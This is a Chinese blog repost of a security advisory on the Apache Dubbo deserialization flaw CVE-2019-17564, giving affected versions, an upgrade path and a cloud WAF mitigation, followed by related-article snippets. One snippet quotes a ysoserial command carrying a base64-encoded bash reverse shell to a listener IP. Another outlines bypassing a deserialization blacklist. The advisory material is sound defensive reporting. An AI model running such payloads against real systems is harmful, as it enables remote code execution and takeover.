Dubbo爆出严重漏洞!可导致网站被控制、数据泄露!附解决方案

最新推荐文章于 2023-11-16 17:47:31 发布
最新推荐文章于 2023-11-16 17:47:31 发布
阅读量989 收藏
点赞数
原文链接:http://honeypps.com/
版权

点击上方“朱小厮的博客”,选择“设为星标”

后台回复”加群“获取公众号专属群聊入口

来源:rrd.me/ganFt

2020年2月13日,华为云安全团队监测到应用广泛的Apache Dubbo出现一个较为严重的漏洞:反序列化漏洞(漏洞编号:CVE-2019-17564)。攻击者利用该漏洞,可在目标网站上远程执行恶意代码,最终导致网站被控制、数据泄露等。目前,华为云Web应用防火墙(Web Application Firewall,WAF)提供了对该漏洞的防护。

一、漏洞原理

Apache Dubbo是一款应用广泛的高性能轻量级的Java 远程调用分布式服务框架,支持多种通信协议。当网站安装了Apache Dubbo并且启用http协议进行通信时,攻击者可以向网站发送POST请求,在请求里可以执行一个反序列化的操作,由于没有任何安全校验,这个反序列化过程可以执行任意代码。这里,序列化是指把某个编程对象转换为字节序列的过程,而反序列化是指把字节序列恢复为某个编程对象的过程。

二、影响的版本范围

漏洞影响的Apache Dubbo产品版本包括:2.7.0~2.7.4、2.6.0~2.6.7、2.5.x 的所有版本。

三、防护方案

1、Apache Dubbo官方建议用户网站升级到安全的2.7.5版本。下载地址如下:

https://github.com/apache/dubbo/tree/dubbo-2.7.5。

2、如无法快速升级版本,或希望防护更多其他漏洞,可使用华为云WAF内置的防护规则对该漏洞进行防护,步骤如下:

1) 购买WAF。

2) 将网站域名添加到WAF中并完成域名接入。

3) 将Web基础防护的状态设置为“拦截”模式。

四、写在最后

你们公司用的是Dubbo还是SpringCloud?如果用的是Dubbo,又是哪个大版本呢(或者基于哪个大版本深度定制)?

想知道更多?描下面的二维码关注我

【精彩推荐】

朕已阅 

朱小厮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Dubbo无法访问远程Zookeeper已注册服务的问题解决方案
08-26
今天小编就为大家分享一篇关于Dubbo无法访问远程Zookeeper已注册服务的问题解决方案,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
Dubbo反序列化漏洞分析集合
AS011x的博客
09-09 3669
调用相应的反序列化函数对数据流进行反序列化操作。,如果不满足则直接抛出异常。若pojo为Map实例,则从pojo(也就是一开始的第三个参数)获取key为“class”的值,并通过反射得到class所对应的类type,再判断对象的类型进行下一步处理。在之前的分析中我们知道了这个方法是用来获取数据体中的一些信息用的,其中一种利用方式就是通过在读取version的时候,调用readUTF方法,跟进。主要是通过获取tag位,进行相应的处理,但是这里关键的就是,当这里不是一个String类型的时候,将会抛出异常。
漏洞分析|Apache Dubbo反序列化漏洞(CVE-2023-23638)
最新发布
xuandaoren的博客
11-16 594
所以我们可以通过上面的 Field 赋值机制, 将 SerializeClassChecker 的 INSTANCE 属性更改为我们自定义的 SerializeClassChecker, 然后在这个自定义的 checker 中, 将 JdbcRowSetImpl 加到白名单里面, 或者将黑名单置空, 或者将 OPEN_CHECK_CLASS 更改为 false, 从而绕过这个检查机制。1、关闭对公网开放的Dubbo服务端端口,仅允许可信任的IP访问。回到 realize0 方法, 继续往下看。
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 752
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
聊聊 Zookeeper 的 4lw 与信息安全
明哥的IT随笔
04-26 1357
最近有个客户在扫描安全漏洞时,反馈 ZOOKEEPER 存在信息泄露问题,即:ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境;
关于Apache Dubbo反序列化漏洞(CVE-2023-23638)的预警提示与对应的Zookeeper版本
u011236069的博客
06-27 1819
Apache官方发布安全公告,修复了Apache Dubbo中的一个反序列化漏洞(CVE-2023-23638)。由于Apache Dubbo安全检查存在缺陷,导致可以绕过反序列化安全检查并执行反序列化攻击,成功利用该漏洞可在目标系统上执行任意代码。Apache Dubbo 2.7.x 版本:
dbcp 连接池不合理的锁导致连接耗尽解决方案
01-20
dbcp 连接池不合理的锁导致连接耗尽解决方案 应用报错,表象来看是连接池爆满了。 org.springframework.transaction.CannotCreateTransactionException: Could not open JDBC Connection for transaction; nested ...
分布式系统架构解决方案Dubbo视频教程
05-09
深入剖析Dubbo架构原理,全面掌握Dubbo的原理和应用 讲解方式: 通过讲解Dubbo的应用场景,使学生掌握其重要性和广泛的应用性 课程内容: Dubbo是一款高性能、轻量级优秀的服务框架,为开发人员带来非常多的便利。本...
基于SpringCloud Alibaba Dubbo解决方案的新闻社区系统.zip
08-20
springboot、Dubbo、MySQL,源码web系统,框架,代码均经过严格测试,可直接运行,有需要可自取
Dubbo分布式事务解决方案
07-20
微服务架构的分布式事务处理方案
生产dubbo漏洞问题修复
weixin_44939862的博客
02-01 901
dubbo漏洞修复
CVE-2020-1948 Apache dubbo远程命令执行漏洞
yyj1781572的博客
04-02 1197
通过该实验了解漏洞产生的原因,掌握基本的漏洞利用及使用方法,并能给出加固方案。
Dubbo从2.5.3升级到2.7.7记录(避免Dubbo远程代码执行漏洞
a10534126的博客
04-01 2558
背景 近日 Dubbo 官方报告了一个 Dubbo 远程代码执行问题(CVE-2020-1948),该问题由 Provider 反序列化漏洞引起。根据介绍,攻击者可以使用无法识别的服务名称或方法名称,并带上一些恶意参数有效载荷发送 RPC 请求。当恶意参数反序列化后,将执行一些恶意代码。 受影响的版本: 2.7.0 <= Dubbo Version <= 2.7.6 2.6.0 <= Dubbo Version <= 2.6.7 所有 2.5.x 版本(官方团队不再支持) 我们之
漏洞预警|Apache Dubbo再现反序列化漏洞,腾讯安全已支持全方位检测防护
wzl_540的专栏
03-15 1148
(2)若直接编译、使用jar包构建项目,可查看jar包版本判断是否可能受漏洞影响(jar包全名:dubbo-x.x.x.jar / dubbo-common-x.x.x.jar,其中dubbo / dubbo-common为包名,x.x.x为版本)。(1)若使用maven构建项目,可在pom.xml等文件中查看引用的maven包版本(maven groupId: org.apache.dubbo,artifactId: dubbo / dubbo-common)。
突发!Dubbo被爆多个版本存在高危漏洞
weixin_43167418的博客
06-30 1511
原文地址:https://www.anquanke.com/post/id/245429作者:360CERT安全通告0x01 漏洞简述2021年06月24日,360CERT监测发现Gi...
Apache Dubbo 存在反序列化漏洞(CVE-2023-23638)
murphysec的博客
03-09 4264
Apache Dubbo 是一款轻量级 Java RPC 框架 该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码
代码审计-dubbo admin <=2.6.1远程命令执行漏洞
weixin_47208161的博客
02-12 5789
前置输入材料安全目标和需求架构分析供应链安全源代码审查依赖结构矩阵(Dependency Structure Matrices,DSM)数据流信任边界数据存贮威胁列表otter mana...
Apache Dubbo 高危漏洞
yes
01-24 2126
你好,我是yes。 前不久 Log4j2 的漏洞不是闹得沸沸扬扬吗,上百个应用更新的那一天,还记忆犹新。 今天又看到了个 Apache Dubbo 的高危漏洞通告,好家伙一看这版本,我们的应用有漏洞… 其实这个漏洞爆出来已经很多天了,影响面没 Log4j2 大,所以没那么“火”,不过也是个高危漏洞。 又是一个可以远程代码执行的漏洞漏洞的类型是因为反序列化的问题。 从 360网络安全响应中心官网来看,1.14 号就通告了。 对这个漏洞的评定结果如下: 可以看到,还是属于影响比较严重漏洞。 具体是因为
ZooKeeper信息泄露漏洞(CVE-2014-085)
热门推荐
Exploit的小站~
05-10 2万+
 研究ZooKeeper时顺便看到的,危害级别比较低,居然上了CVE,目测Apache有干爹照顾。 对于node的访问,ZooKeeper提供了相应的权限控制,即使用访问控制列表ACL来进行实现。一个ACL只从属于一个特定的node,而对这个node的子节点是无效的,也就是不具有递归性。比如/app只能被10.10.10.1访问,/app/test为任何人都可以访问(world,anyon...
springboot + dubbo框架,如何进行更友好的优雅停机,避免任务还没执行时,就被强制关闭导致数据丢失
06-13
在Springboot + Dubbo框架中,为了避免任务执行未完成而导致数据丢失,可以通过优雅停机的方式来解决。 优雅停机的实现方式一般有两种: 1. 优雅停机钩子 在Springboot中,可以通过实现ApplicationRunner或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值